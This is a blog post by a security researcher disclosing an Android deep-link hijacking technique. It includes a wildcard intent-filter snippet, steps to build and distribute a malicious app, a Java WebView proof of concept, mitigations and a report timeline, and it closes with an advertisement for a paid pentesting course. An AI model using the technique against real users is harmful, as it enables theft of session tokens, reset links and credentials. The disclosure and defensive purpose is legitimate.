In this blog, I will explain how I discovered a vulnerability that allowed me to take over multiple accounts by exploiting deep links in Android applications.

Deep Link

Deep links are a type of link that sends users directly to an app instead of a website or store. They are used to navigate users to specific in-app locations, saving time and improving user experience.

Deep linking works by specifying a custom URL scheme (iOS Universal Links) or an intent URL (on Android) that opens an app if it's already installed. These links can also be used for campaigns or specific events.

Attack

Android has a component called "App Links," specifically developed for triggering mobile applications. Even if the app is updated, deep link hijacking remains possible.

Here's how an attacker can exploit it:

1. The attacker develops a malicious app with a deep link hijacking payload.
2. When a user clicks on a deep link, a prompt appears asking whether to open the link "JUST ONCE" or "ALWAYS."
3. If the user selects "ALWAYS," the malicious app is triggered whenever a deep link is clicked.
4. The attacker updates the app to extend the payload, allowing it to hijack any deep link.
5. Users receive and install the update from the Google Play Store.
6. After the update, any clicked link triggers the malware without user interaction.

Technical Explanation

The vulnerability arises from the misuse of Android's intent-filter. By modifying the deep link host pattern in an app update, an attacker can hijack all URLs and force them to open inside the malicious application.

    <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="https" android:host="cappriciosec.com"/>
        <data android:scheme="https" android:host="*.com"/>
    </intent-filter>
                    

Initially, users grant permission only for cappriciosec.com. However, after an update, the wildcard *.com allows all domains to be hijacked. This means sensitive links (Google login, banking pages, etc.) open inside the malicious app.

Impact

This vulnerability can be exploited to:

• Hijack session tokens
• Bypass two-factor authentication (2FA)
• Steal password reset links or tokens
• Compromise account credentials
• Intercept and manipulate web requests

Steps to Reproduce

1. Develop an Android malware with a deep link hijacking payload.
2. Distribute the malicious app and trick users into installing it.
3. Users grant permission to open specific deep links.
4. Update the app with a new payload to hijack all deep links.
5. Now, any link clicked by the user triggers the malware automatically.

Proof of Concept (POC)

    public class MainActivity extends AppCompatActivity {
        private WebView webview;
        private Uri url;
                        
        @Override
        protected void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            setContentView(R.layout.activity_main);
                            
            if (getIntent() != null || getIntent().getData() != null) {
            url = getIntent().getData();
            webview = findViewById(R.id.web);
            webview.setWebViewClient(new WebViewClient());
            webview.loadUrl(String.valueOf(url));
                                
            WebSettings webSettings = webview.getSettings();
            webSettings.setJavaScriptEnabled(true);
                                
            Toast.makeText(getApplicationContext(), "Hacked", Toast.LENGTH_SHORT).show();
                }
            }
        }                    
                    

POC Video 1

POC Video 2

POC Video 3

Mitigation

To prevent deep link hijacking, developers should:

• Verify package name and domain integrity before opening a deep link.
• Use Digital Asset Links (DAL) to validate the app's ownership of a domain.
• Restrict the scope of intent-filters and avoid wildcard hosts.
• Enforce strong authentication before processing sensitive deep links.

Timeline

• Reported to Android OS Security Team: August 7, 2020
• Issue Created: August 10, 2020
• Assigned Date: August 11, 2020

Professional Certified Mobile App Pentesting (Android & iOS) | 100% Live Hacking in Tamil | Real Apps, Real Vulnerabilities, Real Bounties

🔥 Limited-Time Offer: ₹5,500 course now at just ₹2,500!

Enroll / Learn more: https://university.cappriciosec.com/CMABP.html

What you get

• Live, hands-on pentesting on real mobile applications — no fake labs. Learn how real bugs are discovered, validated, and responsibly disclosed.
• Comprehensive curriculum — Android & iOS architecture, app signing, manifest & entitlement analysis, reverse engineering, dynamic instrumentation, network interception, OAuth & deep-link attacks, PKCE, secure storage, mobile-specific exploit mitigations, and remediation guidance.
• Real-world case studies and POC walkthroughs (responsibly redacted for public safety).
• Career & bounty guidance — how to write reports, interact with bug bounty platforms, and turn findings into money or job offers.
• Final certification exam & course completion certificate.
• Live Q&A, lifetime access to recorded sessions, and direct mentorship.

Student success snippets — real wins 🔥

Real outcomes from our Certified Mobile App Pentesting (Android & iOS) course — live sessions in Tamil. No simulated labs, real results.

Demo of our course: